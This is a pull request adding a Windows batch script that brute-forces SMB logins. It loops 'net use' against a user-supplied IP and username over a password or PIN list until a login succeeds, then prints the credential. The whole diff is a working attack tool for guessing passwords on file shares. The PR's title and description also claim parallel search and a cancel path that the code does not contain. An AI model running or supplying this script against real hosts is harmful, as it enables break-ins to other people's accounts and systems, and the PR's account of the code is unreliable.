### PR TITLE
Added pin option and parallel search

### DIFF
--- a/pin_and_parallel.bat
+++ b/pin_and_parallel.bat
@@ -1,0 +1,58 @@
+@echo off
+title SMB Bruteforce - by Ebola Man
+color A
+echo.
+
+:: Prompting for user input
+set /p ip="Enter IP Address: "
+set /p user="Enter Username: "
+set /p method="Enter method (password/pin): "
+
+:: Checking selected method and prompting for the corresponding list
+if /i "%method%"=="password" (
+    set /p wordlist="Enter Password List: "
+) else if /i "%method%"=="pin" (
+    set /p pinlist="Enter PIN List: "
+) else (
+    echo Invalid method selected. Exiting...
+    pause
+    exit /b
+)
+
+:: Initializing attempt counter
+set /a count=1
+
+:: Looping through the password/PIN list and calling the attempt subroutine
+if /i "%method%"=="password" (
+    for /f %%a in (%wordlist%) do (
+        call :attempt "%%a"
+    )
+) else if /i "%method%"=="pin" (
+    for /f %%a in (%pinlist%) do (
+        call :attempt "%%a"
+    )
+)
+
+:: Displaying message if password/PIN not found
+echo Password/PIN not Found :(
+pause
+exit /b
+
+:: Subroutine for successful attempt
+:success
+echo.
+echo Password/PIN Found! %pass%
+net use \\%ip% /d /y >nul 2>&1
+pause
+exit /b
+
+:: Subroutine for attempting to connect with password/PIN
+:attempt
+set pass=%~1
+net use \\%ip% /user:%user% %pass% >nul 2>&1
+echo [ATTEMPT %count%] [%pass%]
+set /a count+=1
+if %errorlevel% EQU 0 goto success
+exit /b
+
+


### PR DESCRIPTION
In this script:

1. I've added a prompt to select the method (password/pin). (As requested on #1)
2. Depending on the selected method, the script prompts for either a password list or a PIN list.
3. The script then iterates through the provided list, calling the :attempt subroutine for each entry.
4. The :attempt subroutine now accepts the password or PIN as an argument.
5. The script terminates if an invalid method is selected or if the user cancels the operation.
6. I've optimized the set /a count=%count%+1 to set /a count+=1 for efficiency.
7. Proper exit codes (exit /b) are used to exit subroutines.